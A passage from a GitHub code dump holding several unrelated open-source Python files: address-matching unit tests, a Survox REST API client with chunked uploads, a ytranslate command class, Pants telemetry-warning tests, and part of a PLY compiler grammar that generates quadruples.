"name": "CSS",
"bytes": "6397"
},
{
"name": "Python",
"bytes": "695767"
},
{
"name": "Ruby",
"bytes": "37167"
},
{
"name": "Shell",
"bytes": "1261"
},
{
"name": "TeX",
"bytes": "250368"
}
],
"symlink_target": ""
} |
import unittest
from usig_normalizador_amba.commons import normalizarTexto, matcheaTexto
from usig_normalizador_amba.commons import MATCH_EXACTO, MATCH_PERMUTADO, MATCH_INCLUIDO, MATCH, NO_MATCH
class CommonsTestCase(unittest.TestCase):
    """Tests for the text normalisation and matching helpers."""

    NAME = 'Lomas de Zamora'

    def test_normalizarTexto_acentos(self):
        """Diacritics are stripped down to plain ASCII letters."""
        self.assertEqual(
            normalizarTexto('ábçdéfǵhíjḱĺḿńñóṕqŕśtúvẃxýźÁBÇDÉFǴHÍJḰĹḾŃÑÓṔQŔŚTÚVẂXÝŹäëïöüÄËÏÖÜ'),
            'abcdefghijklmnnopqrstuvwxyzabcdefghijklmnnopqrstuvwxyzaeiouaeiou')

    def test_normalizarTexto_espacios(self):
        """Surrounding whitespace is trimmed."""
        self.assertEqual(normalizarTexto(' hola chau '), 'hola chau')

    def test_normalizarTexto_lower(self):
        """lower=False yields upper-cased output."""
        self.assertEqual(normalizarTexto(' hola á chau ', lower=False),
                         'HOLA A CHAU')

    def test_normalizarTexto_separador(self):
        """A custom separator replaces the spaces between words."""
        self.assertEqual(normalizarTexto(' hola á chau ', separador='_'),
                         'hola_a_chau')

    def test_normalizarTexto_simbolos(self):
        """Punctuation and symbols are dropped entirely."""
        self.assertEqual(normalizarTexto('hola !#$%&/()=?¡@"\\\' chau'),
                         'hola chau')

    def test_matcheaTexto_no_match(self):
        """Texts with extra or unrelated tokens do not match."""
        for texto in ('partido de Lomas de Zamora', 'Lanús'):
            self.assertEqual(matcheaTexto(texto, self.NAME), NO_MATCH)

    def test_matcheaTexto_exacto(self):
        """Identical (post-normalisation) texts match exactly."""
        for texto, nombre in (('Lomas de Zamora', self.NAME),
                              ('Lanus', 'Lanús')):
            self.assertEqual(matcheaTexto(texto, nombre), MATCH_EXACTO)

    def test_matcheaTexto_permutado(self):
        """Any permutation of the full token set matches as permuted."""
        for texto in ('de lomas zamora', 'lomas zamora de',
                      'zamora lomas de', 'zamora de lomas'):
            self.assertEqual(matcheaTexto(texto, self.NAME), MATCH_PERMUTADO)

    def test_matcheaTexto_incluido(self):
        """A subset of the tokens matches as included."""
        for texto in ('Lomas', 'Lomas de', 'Lomas ZAMORA', 'ZAMORA Lomas'):
            self.assertEqual(matcheaTexto(texto, self.NAME), MATCH_INCLUIDO)

    def test_matcheaTexto_match(self):
        """Empty input and token prefixes produce a plain match."""
        for texto in ('', 'Lom ZAM'):
            self.assertEqual(matcheaTexto(texto, self.NAME), MATCH)

    def test_matcheaTexto_normalizacion(self):
        """Symbols and accents are normalised away before matching."""
        self.assertEqual(matcheaTexto('- (lomas, dé, zámórá)-', self.NAME),
                         MATCH_EXACTO)

    def test_matcheaTexto_case(self):
        """Matching is case-insensitive by default."""
        self.assertEqual(matcheaTexto('lOMAS DE zAMORA', self.NAME),
                         MATCH_EXACTO)

    def test_matcheaTexto_no_normalizar_no_match(self):
        """With normalizar=False the comparison is strict."""
        for texto, nombre in (('Lanus', 'Lanús'),
                              ('- (lomas, dé, zámórá)-', self.NAME),
                              ('de lomas zamora', self.NAME),
                              ('lOMAS DE zAMORA', self.NAME)):
            self.assertEqual(matcheaTexto(texto, nombre, normalizar=False),
                             NO_MATCH)
| {
"content_hash": "fa6627f9b3313bfa7a45baef5500cd0c",
"timestamp": "",
"source": "github",
"line_count": 83,
"max_line_length": 105,
"avg_line_length": 43.71084337349398,
"alnum_prop": 0.6595920617420066,
"repo_name": "usig/normalizador-amba",
"id": "78279f4ad05e2dc573c08357c91cb026a6db2758",
"size": "3713",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/CommonsTestCase.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "431"
},
{
"name": "Python",
"bytes": "130246"
}
],
"symlink_target": ""
} |
import hashlib
import os
import errno
import tempfile
from json import dumps as json_dumps
import requests
from .exception import SurvoxAPIException, SurvoxAPINotFound
class SurvoxAPIBase:
    """
    Base class to use requests to interact with the Survox API.

    Stores the API base URL and the authentication headers and wraps the
    HTTP verbs so every call gets the auth headers, optional query
    parameters, request/response logging, and uniform response unwrapping
    (raising SurvoxAPIException / SurvoxAPINotFound on failure).
    """

    def __init__(self, base_url, headers, verbose=True):
        """
        :param base_url: root URL of the API; relative endpoints are joined to it
        :param headers: authentication headers merged into every request
        :param verbose: when True, print a summary of each request/response
        """
        self.base_url = base_url
        self.auth_headers = headers
        self.verbose = verbose

    def api_get(self, endpoint, headers=None, full_response=False, **kwargs):
        """
        Make a GET request to the specified endpoint
        :param endpoint: api endpoint
        :param headers: extra headers to pass with request
        :param full_response: return the requests response structure
        :param kwargs: query parameters; entries whose value is None are dropped
        :return: api response data, or full requests response structure
        """
        endpoint, headers = self._update_request_info('GET', endpoint, headers)
        query = {k: v for (k, v) in kwargs.items() if v is not None}
        r = requests.get(url=endpoint, headers=headers, params=query)
        if full_response:
            return r
        return self._check_response(r, 'GET', endpoint)

    def api_post(self, endpoint, data=None, json=None, headers=None, full_response=False, **kwargs):
        """
        Make a POST request to the specified endpoint
        :param endpoint: api endpoint
        :param data: data to post
        :param json: data to post in json format
        :param headers: extra headers to pass with request
        :param full_response: return the requests response structure
        :param kwargs: query parameters; entries whose value is None are dropped
        :return: api response data, or full requests response structure
        """
        endpoint, headers = self._update_request_info('POST', endpoint, headers)
        query = {k: v for (k, v) in kwargs.items() if v is not None}
        if json:
            # Serialize once and send as the body with an explicit JSON
            # content type.
            headers.update({"Content-Type": "application/json"})
            r = requests.post(endpoint, data=json_dumps(json), headers=headers, params=query)
        else:
            r = requests.post(url=endpoint, data=data, headers=headers, params=query)
        if full_response:
            return r
        return self._check_response(r, 'POST', endpoint)

    def api_put(self, endpoint, data=None, json=None, headers=None, files=None, full_response=False, **kwargs):
        """
        Make a PUT request to the specified endpoint
        :param endpoint: api endpoint
        :param data: data to post, works for simple dictionaries
        :param json: data to post using json for nested dictionaries, etc.
        :param headers: extra headers to pass with request
        :param files: files object to upload
        :param full_response: return the requests response structure
        :param kwargs: query parameters; entries whose value is None are dropped
        :return: api response data, or full requests response structure
        """
        endpoint, headers = self._update_request_info('PUT', endpoint, headers)
        query = {k: v for (k, v) in kwargs.items() if v is not None}
        if files:
            # The files branch deliberately returns the raw response without
            # status checking: api_upload() inspects the response itself.
            return requests.put(url=endpoint, data=data, headers=headers, files=files, params=query)
        if json:
            # Bug fix: the previous code passed the already-serialized string
            # to requests' ``json=`` parameter, which JSON-encodes it a second
            # time (the server would receive a quoted string instead of an
            # object).  Serialize once and send as the body, mirroring
            # api_post().
            headers.update({"Content-Type": "application/json"})
            r = requests.put(url=endpoint, data=json_dumps(json), headers=headers, params=query)
        else:
            r = requests.put(url=endpoint, data=data, headers=headers, params=query)
        if full_response:
            return r
        return self._check_response(r, 'PUT', endpoint)

    def api_delete(self, endpoint, headers=None, full_response=False, **kwargs):
        """
        Make a DELETE request to the specified endpoint
        :param endpoint: api endpoint
        :param headers: extra headers to pass with request
        :param full_response: return the requests response structure
        :param kwargs: query parameters; entries whose value is None are dropped
        :return: api response data, or full requests response structure
        """
        endpoint, headers = self._update_request_info('DELETE', endpoint, headers)
        query = {k: v for (k, v) in kwargs.items() if v is not None}
        r = requests.delete(url=endpoint, headers=headers, params=query)
        if full_response:
            return r
        return self._check_response(r, 'DELETE', endpoint)

    def _update_request_info(self, method, endpoint, headers):
        """
        Resolve a possibly-relative endpoint against base_url and merge the
        auth headers into the caller's headers (note: mutates the passed-in
        headers dict when one is supplied).
        :return: (absolute endpoint, merged headers)
        """
        if not (endpoint.startswith(self.base_url) or endpoint.startswith("http")):
            if not endpoint.startswith('/'):
                endpoint = self.base_url + '/' + endpoint
            else:
                endpoint = self.base_url + endpoint
        if headers:
            headers.update(self.auth_headers)
        else:
            headers = self.auth_headers
        if self.verbose:
            print('Request {method} {endpoint}'.format(method=method, endpoint=endpoint))
        return endpoint, headers

    def _check_response(self, r, method, endpoint):
        """
        Validate an API response and unwrap its payload.
        :raises SurvoxAPINotFound: on HTTP 404
        :raises SurvoxAPIException: on any other non-2xx status, non-JSON
            body, non-'success' status field, or missing 'data' field
        :return: the payload's 'data' member
        """
        if self.verbose:
            print('Response {method} {endpoint} {result} {length}'.format(method=method, endpoint=endpoint,
                                                                          result=r.status_code, length=len(r.text)))
        if not 200 <= r.status_code < 300:
            if r.status_code == 404:
                raise SurvoxAPINotFound(method, endpoint, r)
            else:
                raise SurvoxAPIException(method, endpoint, r)
        try:
            payload = r.json()
        except Exception:
            raise SurvoxAPIException(method, endpoint, r)
        if 'status' not in payload or payload['status'] != 'success':
            raise SurvoxAPIException(method, endpoint, r)
        if 'data' not in payload:
            raise SurvoxAPIException(method, endpoint, r)
        return payload['data']

    def api_upload(self, endpoint, filename, block_size=None):
        """
        Upload a file to the endpoint in MD5-checksummed chunks.

        Each chunk is PUT with a CONTENT-RANGE header; the server returns the
        URL for the next chunk.  After the last chunk, the cumulative MD5 is
        POSTed to finalize the upload.
        :param endpoint: api endpoint
        :param filename: name of the file to upload
        :param block_size: max size of a file block to send at a time
            (defaults to 1,000,000 bytes)
        :return: the 'data' member of the finalize response
        :raises FileNotFoundError: when filename does not exist
        :raises RuntimeError: when the server rejects a chunk or the finalize
        """
        if not os.path.isfile(filename):
            raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), filename)
        hash_md5 = hashlib.md5()
        file_size = os.path.getsize(filename)
        upload_name = os.path.basename(filename)
        if not block_size:
            block_size = 1000000
        with open(filename, "rb") as f:
            offset = 0
            for block in iter(lambda: f.read(block_size), b""):
                hash_md5.update(block)
                temp = tempfile.NamedTemporaryFile()
                try:
                    temp.write(block)
                    temp.seek(0)
                    chunk_end = offset + len(block)
                    my_headers = {
                        'CONTENT-RANGE': "bytes {offset}-{chunk_end}/{filesize}".format(offset=offset,
                                                                                        chunk_end=chunk_end,
                                                                                        filesize=file_size)
                    }
                    cur_data = {'filename': upload_name}
                    # 'file_payload' (was 'file', shadowing the builtin).
                    file_payload = [('file', (temp.name, block))]
                    res = self.api_put(endpoint=endpoint, headers=my_headers, data=cur_data,
                                       files=file_payload, full_response=True)
                finally:
                    # Ensure the temp file is removed even if the PUT raises.
                    temp.close()
                try:
                    content = res.json()
                except ValueError:
                    raise RuntimeError('Content' + res.text)
                if content['status'] != "success":
                    raise RuntimeError(content['data'])
                offset = chunk_end
                # The server hands back the endpoint for the next chunk.
                endpoint = content['data']['url']
        md5hash = hash_md5.hexdigest()
        # Finalize the upload by posting the whole-file checksum.
        cur_data = {"md5": "{hash}".format(hash=md5hash)}
        res = self.api_post(endpoint=endpoint, data=cur_data, full_response=True)
        try:
            content = res.json()
        except ValueError:
            raise RuntimeError('Content' + res.text)
        if content['status'] != "success":
            raise RuntimeError(content['data'])
        return content['data']

    def api_download(self, endpoint, filename, headers=None):
        """
        Download a file from the API endpoint
        :param endpoint: api endpoint
        :param filename: file to save response in
        :param headers: any additional headers to send when making request
        :return: dict of the response headers
        :raises RuntimeError: when the request fails
        """
        endpoint, headers = self._update_request_info('DOWNLOAD', endpoint, headers)
        return_headers = {}
        with open(filename, 'wb') as handle:
            response = requests.get(endpoint, headers=headers, stream=True)
            if not response.ok:
                raise RuntimeError("Unable to download file from {url}".format(url=endpoint))
            for h, v in response.headers.items():
                return_headers[h] = v
            # Stream the body to disk in 1 KiB chunks.
            for block in response.iter_content(1024):
                handle.write(block)
        return return_headers
| {
"content_hash": "2af9deaea961ab9de2828d196f2822c3",
"timestamp": "",
"source": "github",
"line_count": 204,
"max_line_length": 120,
"avg_line_length": 43.78431372549019,
"alnum_prop": 0.5867666815942678,
"repo_name": "cbeauvais/zAWygzxkeSjUBGGVsgMGTF56xvR",
"id": "60736d5841e43baeeeddea70d36efb100f22e764",
"size": "8932",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "survox_api/resources/base.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "89943"
},
{
"name": "Shell",
"bytes": "2352"
}
],
"symlink_target": ""
} |
# Copyright (c) 2015, LE GOFF Vincent
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of ytranslate nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Module containing the Command class, described below."""
from ytranslate.commands.base import BaseCommand
from ytranslate.commands.catalogs import CatalogsCommand
from ytranslate.commands.update import UpdateCommand
class Command(BaseCommand):
    """Main command, parents of them all."""

    def __init__(self):
        BaseCommand.__init__(self)
        # Register every top-level subcommand on the root command.
        for subcommand_class in (CatalogsCommand, UpdateCommand):
            self.add_subcommand(subcommand_class)
| {
"content_hash": "e0c111a5856668d589ed003425a0c3bb",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 80,
"avg_line_length": 45.883720930232556,
"alnum_prop": 0.7759756715661429,
"repo_name": "vlegoff/ytranslate",
"id": "c9e91b05e719583300c9284de258d6ee7783585e",
"size": "1975",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ytranslate/commands/command.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "53550"
}
],
"symlink_target": ""
} |
from __future__ import annotations
from pants.testutil.pants_integration_test import run_pants
_no_explicit_setting_msg = "An explicit setting will get rid of this message"
_no_repo_id_msg = 'set `repo_id = "<uuid>"` in the [anonymous-telemetry] section of pants.toml'
_bad_repo_id_msg = "must be between 30 and 60 characters long"
def test_warn_if_no_explicit_setting() -> None:
    """With no [anonymous-telemetry] config at all, only the opt-in nag appears."""
    pants_run = run_pants(["roots"], config={})
    pants_run.assert_success()
    assert _no_explicit_setting_msg in pants_run.stderr
    for absent_msg in (_no_repo_id_msg, _bad_repo_id_msg):
        assert absent_msg not in pants_run.stderr
def test_warn_if_repo_id_unset() -> None:
    """Enabling telemetry without a repo_id warns only about the missing id."""
    pants_run = run_pants(["roots"], config={"anonymous-telemetry": {"enabled": True}})
    pants_run.assert_success()
    assert _no_repo_id_msg in pants_run.stderr
    for absent_msg in (_no_explicit_setting_msg, _bad_repo_id_msg):
        assert absent_msg not in pants_run.stderr
def test_warn_if_repo_id_invalid() -> None:
    """A repo_id outside the allowed length range triggers the length warning."""
    pants_run = run_pants(
        ["roots"],
        config={"anonymous-telemetry": {"enabled": True, "repo_id": "tooshort"}},
    )
    pants_run.assert_success()
    assert _bad_repo_id_msg in pants_run.stderr
    for absent_msg in (_no_explicit_setting_msg, _no_repo_id_msg):
        assert absent_msg not in pants_run.stderr
def test_no_warn_if_explicitly_on() -> None:
    """A valid explicit opt-in produces no telemetry warnings at all."""
    pants_run = run_pants(
        ["roots"],
        config={"anonymous-telemetry": {"enabled": True, "repo_id": 36 * "a"}},
        use_pantsd=False,
    )
    pants_run.assert_success()
    for absent_msg in (_no_explicit_setting_msg, _no_repo_id_msg, _bad_repo_id_msg):
        assert absent_msg not in pants_run.stderr
def test_no_warn_if_explicitly_off() -> None:
    """An explicit opt-out produces no telemetry warnings at all."""
    pants_run = run_pants(["roots"], config={"anonymous-telemetry": {"enabled": False}})
    pants_run.assert_success()
    for absent_msg in (_no_explicit_setting_msg, _no_repo_id_msg, _bad_repo_id_msg):
        assert absent_msg not in pants_run.stderr
| {
"content_hash": "1ce30cd8d9e470d4ac605688f4952ae4",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 95,
"avg_line_length": 36.46296296296296,
"alnum_prop": 0.6749619095987811,
"repo_name": "patricklaw/pants",
"id": "9d1d44d581dceafc5c303e7f564c888b31379548",
"size": "2101",
"binary": false,
"copies": "3",
"ref": "refs/heads/scala",
"path": "src/python/pants/goal/anonymous_telemetry_integration_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
import sys
sys.path.insert(0, "../..")
from Cube import *
from Machine import *
# Python 2/3 shim: expose raw_input on Python 3, where it was renamed input.
if sys.version_info[0] >= 3:
    raw_input = input

#Define global variables
# Virtual-memory address counters, one per base type and per segment.  The
# trailing comments show the presumed segment bases (10000 global, 20000
# local, 30000 temporary, 40000 constant); the INITIAL*/INTIAL* constants
# come from Cube -- confirm the actual values there.
globalVarCount = {} #10000
globalVarCount[BOOL] = INITIALGLOBALBOOL
globalVarCount[INT] = INITIALGLOBALINT
globalVarCount[FLOAT] = INITIALGLOBALFLOAT
globalVarCount[STRING] = INITIALGLOBALSTRING
localVarCount = {} #20000
localVarCount[BOOL] = INTIALLOCALBOOL
localVarCount[INT] = INTIALLOCALINT
localVarCount[FLOAT] = INTIALLOCALFLOAT
localVarCount[STRING] = INTIALLOCALSTRING
tempVarCount = {} #30000
tempVarCount[BOOL] = INITIALTEMPBOOL
tempVarCount[INT] = INITIALTEMPINT
tempVarCount[FLOAT] = INTIALTEMPFLOAT
tempVarCount[STRING] = INITIALTEMPSTRING
constVarCount = {} #40000
constVarCount[BOOL] = INITIALCONSTBOOL
constVarCount[INT] = INITIALCONSTINT
constVarCount[FLOAT] = INITIALCONSTFLOAT
constVarCount[STRING] = INTIALCONSTSTRING

# Intermediate-code state shared by the grammar actions below.
quadruples = []     # emitted quadruples: {'op', 'var1', 'var2', 'result'}
operandStack = []   # pending operands during expression parsing
operationStack = [] # pending operators during expression parsing
jumpStack = []      # quadruple indices awaiting backpatching (GOTO/GOTOF)
sendParams = []     # declared parameters of the function currently being called
argumentCount = 0   # number of arguments seen in the current call

# Constant table, pre-seeded with true/false/-1 and their fixed addresses.
constants = {'true':{'value':True, 'type':BOOL, 'dir':40001}, 'false':{'value':False, 'type':BOOL, 'dir':40000}, '-1':{'value':-1, 'type':INT, 'dir':42500}}

# Symbol tables and bookkeeping for the declaration currently being parsed.
varGlobal = {}        # global variables by name
varLocal = {}         # local variables of the function being compiled
funcGlobal = {}       # function directory
funcParameters = []   # parameters collected for the current function
variableType = None   # type of the variable declaration in progress
funcType = None       # return type of the function declaration in progress
lastVarName = None    # most recently seen variable name
lastFuncName = None   # most recently seen function name
funcTypeNext = False  # next 'type' token belongs to a function, not a variable
scope = 'global'      # current scope: 'global' or 'local'
# Tokens
# PLY lexer definition.  NOTE: in PLY the docstring / pattern string of each
# t_* rule IS the token's regular expression, so those strings must not be
# edited as documentation.
reserved = {
    'module' : 'MODULE',
    'main' : 'MAIN',
    'func' : 'FUNC',
    'print' : 'PRINT',
    'read' : 'READ',
    'if' : 'IF',
    'else' : 'ELSE',
    'elseif' : 'ELSEIF',
    'true' : 'TRUE',
    'false' : 'FALSE',
    'void' : 'VOID',
    'while' : 'WHILE',
    'bool' : 'TBOOL',
    'int' : 'TINT',
    'float' : 'TFLOAT',
    'string' : 'TSTRING',
    'return' : 'RETURN'
}

tokens = [
    'ASSIGN', 'PLUS', 'MINUS', 'TIMES', 'DIVIDE',
    'LESSTHAN', 'GREATERTHAN', 'LESSTHANEQ', 'GREATERTHANEQ', 'EQUAL', 'DIFFERENT', 'OR', 'AND',
    'LEFTBKT', 'RIGHTBKT', 'LEFTSQBKT', 'RIGHTSQBKT', 'LEFTPAREN', 'RIGHTPAREN', 'COMMA', 'SEMICOLON',
    'ID', 'NUMBERINT', 'NUMBERFLT', 'STRING'
] + list(reserved.values())

# Simple tokens defined by a single regex each.
t_ASSIGN = r'='
t_PLUS = r'\+'
t_MINUS = r'\-'
t_TIMES = r'\*'
t_DIVIDE = r'\/'
t_LESSTHAN = r'\<'
t_GREATERTHAN = r'\>'
t_LESSTHANEQ = r'\<='
t_GREATERTHANEQ = r'\>='
t_EQUAL = r'=='
t_DIFFERENT = r'!='
t_OR = r'\|\|'
t_AND = r'&&'
t_LEFTBKT = r'\{'
t_RIGHTBKT = r'\}'
t_LEFTSQBKT = r'\['
t_RIGHTSQBKT = r'\]'
t_LEFTPAREN = r'\('
t_RIGHTPAREN = r'\)'
t_COMMA = r'\,'
t_SEMICOLON = r'\;'
t_NUMBERINT = r'[0-9]+'
t_NUMBERFLT = r'[0-9]+\.[0-9]+'

t_ignore = " \t"

def t_ID(t):
    r'[a-z_][a-zA-Z0-9_]*'
    # Reclassify identifiers that are actually reserved words.
    t.type = reserved.get(t.value, 'ID')
    return t

def t_STRING(t):
    r'\".*\"'
    return t

def t_newline(t):
    r'\n+'
    # Keep the line counter accurate for error reporting.
    t.lexer.lineno += t.value.count("\n")

def t_error(t):
    # On an illegal character: report it, skip one char, keep lexing.
    print("Illegal character '%s'" % t.value[0])
    t.lexer.skip(1)

# Build the lexer
import ply.lex as lex
lex.lex()

# Start symbol of the grammar.
start = 'moduleg'
# For using empty
# PLY grammar rules.  NOTE: each p_* rule's docstring IS the grammar
# production, so those strings must not be edited as documentation.
def p_empty(p):
    '''empty :'''
    pass

def p_functions(p):
    # Zero or more function definitions.
    '''functions : empty
                 | funcg functions'''

def p_globalVars(p):
    # Zero or more global variable declarations.
    '''globalVars : empty
                  | vars globalVars'''

def p_moduleg(p):
    # Top-level rule: a module is global vars, functions, then main.
    '''moduleg : MODULE ID LEFTBKT globalVars jumpToMain functions maing RIGHTBKT'''

def p_vars4(p):
    # Initializer value: a constant with an optional sign; a leading '-'
    # is folded into the string so p_vars1 can detect it.
    '''vars4 : constant
             | PLUS constant
             | MINUS constant'''
    p[0] = p[1]
    if len(p) > 2:
        p[0] = p[2]
        if p[1] == '-':
            p[0] = '-'+p[2]

def p_vars3(p):
    # Optional array dimension: converts the just-declared variable.
    '''vars3 : empty
             | LEFTSQBKT cteN RIGHTSQBKT'''
    if len(p) > 2:
        convertVariableToArray(p[2])

def p_vars2(p):
    # Further declarations on the same line, comma separated.
    '''vars2 : empty
             | COMMA vars1'''

def p_vars1(p):
    # One declaration with a mandatory initializer; emits the assignment.
    '''vars1 : ID addVariable vars3 ASSIGN vars4'''
    var = {}
    if p[1] in varLocal.keys():
        var = varLocal[p[1]]
    else:
        var = varGlobal[p[1]]
    if '-' in p[5]:
        # Negative initializer: emit value * -1 into the variable.
        p[5] = p[5].replace('-','')
        addQuadruple('*', constants['-1']['dir'], constants[p[5]]['dir'], var['dir'])
    else:
        addQuadruple('=', constants[p[5]]['dir'], '', var['dir'])
    # getTypeValue/getResultType presumably come from the Cube star-import.
    if getResultType(var['type'], '=', constants[p[5]]['type']) < 0:
        print('Error: Assignment type mismatch')
        exit(1)

def p_vars(p):
    '''vars : type vars1 vars2 SEMICOLON'''

def p_func3(p):
    # Body of a typed function: statements, optionally ending in a return.
    '''func3 : empty
             | RETURN expression funcReturn SEMICOLON
             | statute func3'''

def p_func2(p):
    # Body of a void function: statements only.
    '''func2 : empty
             | statute func2'''

def p_func1(p):
    '''func1 : VOID saveFuncTypeVoid ID saveFuncName LEFTPAREN parameters RIGHTPAREN funcStart LEFTBKT func2 RIGHTBKT funcEnd
             | funcTypeNext type ID saveFuncName LEFTPAREN parameters RIGHTPAREN funcStart LEFTBKT func3 RIGHTBKT funcEnd'''

def p_funcg(p):
    # Functions compile in local scope; restore global scope afterwards.
    '''funcg : FUNC changeToLocalScope func1 changeToGlobalScope'''

def p_maing(p):
    '''maing : MAIN changeToLocalScope completeJumpToMain block'''
    # End of program: emit END and dump the generated code and tables.
    addQuadruple('END', '', '', '')
    print('-------- quadruples')
    for i in range(0, len(quadruples)):
        q = quadruples[i]
        print('%s {var1:%s } {op:%s } {var2:%s } {result:%s }' % (i, q['var1'], q['op'], q['var2'], q['result']))
    print('--------')
    print('-------- stacks')
    print(operandStack)
    print(operationStack)
    print(jumpStack)
    print('--------')
    print('global vars: %s' % varGlobal)
    print('functions: %s' % funcGlobal)
    print('constants: %s' % constants)

def p_block1(p):
    '''block1 : empty
              | statute block1'''

def p_block(p):
    '''block : LEFTBKT block1 RIGHTBKT'''

def p_write(p):
    '''write : PRINT LEFTPAREN cte RIGHTPAREN SEMICOLON'''
    # Resolve the operand (local, global, or constant) and emit PRINT.
    var = {}
    if p[3] in varLocal.keys():
        var = varLocal[p[3]]
    elif p[3] in varGlobal.keys():
        var = varGlobal[p[3]]
    else:
        var = constants[p[3]]
    addQuadruple('PRINT', '', '', var['dir'])

def p_readg(p):
    '''readg : READ LEFTPAREN ID RIGHTPAREN SEMICOLON'''
    # READ targets must be declared variables (local shadows global).
    var = {}
    if p[3] in varLocal.keys():
        var = varLocal[p[3]]
    else:
        var = varGlobal[p[3]]
    addQuadruple('READ', '', '', var['dir'])
def p_expression1(p):
    # Relational / logical tail of an expression.  When the operator on top
    # of the stack is relational, pop both operands and emit the quadruple.
    '''expression1 : empty
                   | GREATERTHANEQ saveOperation exp
                   | LESSTHANEQ saveOperation exp
                   | GREATERTHAN saveOperation exp
                   | LESSTHAN saveOperation exp
                   | EQUAL saveOperation exp
                   | DIFFERENT saveOperation exp
                   | OR saveOperation exp
                   | AND saveOperation exp'''
    global operationStack
    global operandStack
    if len(operationStack) > 0:
        if operationStack[-1] == '<' or operationStack[-1] == '>' or operationStack[-1] == '<=' or operationStack[-1] == '>=' or operationStack[-1] == '==' or operationStack[-1] == '!=':
            operand2 = operandStack.pop()
            operation = operationStack.pop()
            operand1 = operandStack.pop()
            resultType = getResultType(operand1['type'], operation, operand2['type'])
            if resultType > 0:
                # Allocate a temporary for the comparison result.
                tempVar = {'dir':tempVarCount[resultType], 'type':resultType}
                addQuadruple(operation, operand1['dir'], operand2['dir'], tempVar)
                operandStack.append(tempVar)
                tempVarCount[resultType] += 1
            else:
                print('Error: Expression type mismatch')
                exit(1)
            p[0] = tempVar

def p_expression(p):
    '''expression : exp expression1'''

def p_exp1(p):
    # Additive tail; '+'/'-' are pushed and resolved by termEnded.
    '''exp1 : empty
            | PLUS saveOperation exp exp1
            | MINUS saveOperation exp exp1'''
    p[0] = p[1]
    if len(p) > 2:
        p[0] = p[3]

def p_exp(p):
    '''exp : term exp1'''
    p[0] = p[1]

def p_term1(p):
    # Multiplicative tail; '*'/'/' are pushed and resolved by factorEnded.
    '''term1 : empty
             | TIMES saveOperation term term1
             | DIVIDE saveOperation term term1'''

def p_term(p):
    '''term : factor term1 termEnded'''

def p_factor1(p):
    # A constant operand with an optional sign; negation is emitted as
    # a multiplication by the constant -1 into a temporary.
    '''factor1 : constant
               | PLUS constant
               | MINUS constant'''
    global operandStack
    operand = {}
    if len(p) == 3:
        operand = getOperand(p[2])
        if p[1] == '-':
            # type % 10 presumably maps array type codes back to the base
            # type -- confirm against Cube's encoding.
            resultType = getResultType(operand['type']%10, '*', INT)
            tempVar = {'dir':tempVarCount[resultType], 'type':resultType}
            addQuadruple('*', constants['-1']['dir'], operand, tempVar['dir'])
            operand = tempVar
            tempVarCount[resultType] += 1
    else:
        operand = getOperand(p[1])
    operandStack.append(operand)

def p_factor(p):
    # Parenthesized sub-expressions isolate their operators with a fake
    # bottom marker on the operator stack.
    '''factor : LEFTPAREN addFakeBottom expression RIGHTPAREN removeFakeBottom factorEnded
              | factor1 factorEnded'''

def p_statute(p):
    '''statute : call
               | assignement
               | vars
               | condition
               | readg
               | write
               | cycle'''
    # Only 'call' propagates a value here: discard an unused non-void result.
    if p[1] is not None:
        if p[1] != VOID:
            print('Warning: Unused function return value.')
            operandStack.pop()

def p_cycle(p):
    '''cycle : WHILE whileStart LEFTPAREN expression RIGHTPAREN whileCheck block whileEnd'''

def p_call2(p):
    # Remaining call arguments; each emits a PARAM quadruple after a
    # type check against the declared parameter.
    '''call2 : empty
             | COMMA expression addArgument call2'''
    global argumentCount
    if argumentCount != len(sendParams):
        print('Error: Number of arguments doesn\'t match number of parameters declared')
        exit(1)
    if len(p) == 5:
        argumentCount -= 1
        argument = operandStack.pop()
        parameter = sendParams.pop()
        resultType = getResultType(parameter['type'], '=', argument['type'])
        if resultType > 0:
            addQuadruple('PARAM', argument['dir'], '', parameter['dir'])
        else:
            print('Error: Argument type doesn\'t match the type of the parameter declared')
            exit(1)

def p_call1(p):
    # First call argument (or an empty argument list).
    '''call1 : empty
             | expression addArgument call2'''
    global argumentCount
    if argumentCount != len(sendParams):
        print('Error: Number of arguments doesn\'t match number of parameters declared')
        exit(1)
    if len(p) == 4:
        argument = operandStack.pop()
        parameter = sendParams.pop()
        resultType = getResultType(parameter['type'], '=', argument['type'])
        if resultType > 0:
            addQuadruple('PARAM', argument['dir'], '', parameter['dir'])
        else:
